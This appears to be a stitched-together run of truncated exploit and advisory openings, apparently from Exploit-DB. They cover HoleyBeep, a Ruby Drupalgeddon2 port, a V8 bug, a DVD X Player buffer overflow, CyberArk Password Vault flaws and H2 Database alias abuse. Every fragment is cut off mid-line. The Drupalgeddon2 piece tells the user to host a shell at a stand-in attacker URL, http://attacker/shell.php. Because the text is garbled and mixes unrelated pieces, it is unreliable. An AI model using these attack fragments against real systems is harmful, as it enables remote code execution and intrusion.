#!/usr/bin/env python3 # # E-DB Note ~ https://gist.github.com/Arignir/0b9d45c56551af39969368396e27abe8/ec853f14afd6e86fb3f2efce2086e28f33039ddc # E-DB Note ~ https://sigint.sh/#/holeybeep # # This is an exploit for HoleyBeep. # # To use it, place a
# EDB-Note. Have the contents of shell on http://attacker/shell.php require 'net/http' # Hans Topo ruby port from Drupalggedon2 exploit. # Based on Vitalii Rudnykh exploit target = ARGV[0] command = ARGV[1] url = target + '/user/register?element_pare
/* I think this commit has introduced the bug: https://chromium.googlesource.com/v8/v8.git/+/9884bc5dee488bf206655f07b8a487afef4ded9b Reduction LoadElimination::ReduceTransitionElementsKind(Node* node) { ... if (object_maps.contains(ZoneHandleSetMap(
###################################################### # Exploit Title: Buffer Overflow on DVD X Player Standard 5.5.3.9 # Date: 29.03.2018 # Vendor Homepage: http://www.dvd-x-player.com # Software Link: http://www.dvd-x-player.com/download/DVDXPlaye
Advisory: CyberArk Password Vault Web Access Remote Code Execution The CyberArk Password Vault Web Access application uses authentication tokens which consist of serialized .NET objects. By crafting manipulated tokens, attackers are able to gain unau
Advisory: CyberArk Password Vault Memory Disclosure Data in the CyberArk Password Vault may be accessed through a proprietary network protocol. While answering to a client's logon request, the vault discloses around 50 bytes of its memory to the clie
''' Exploit Title: H2 Database Alias Abuse Date: 05/04/2018 Exploit Author: gambler Vendor Homepage:www.h2database.com Software Link: http://www.h2database.com/html/download.html Version: all versions Tested on: Linux, Mac OS ''' import sys import ar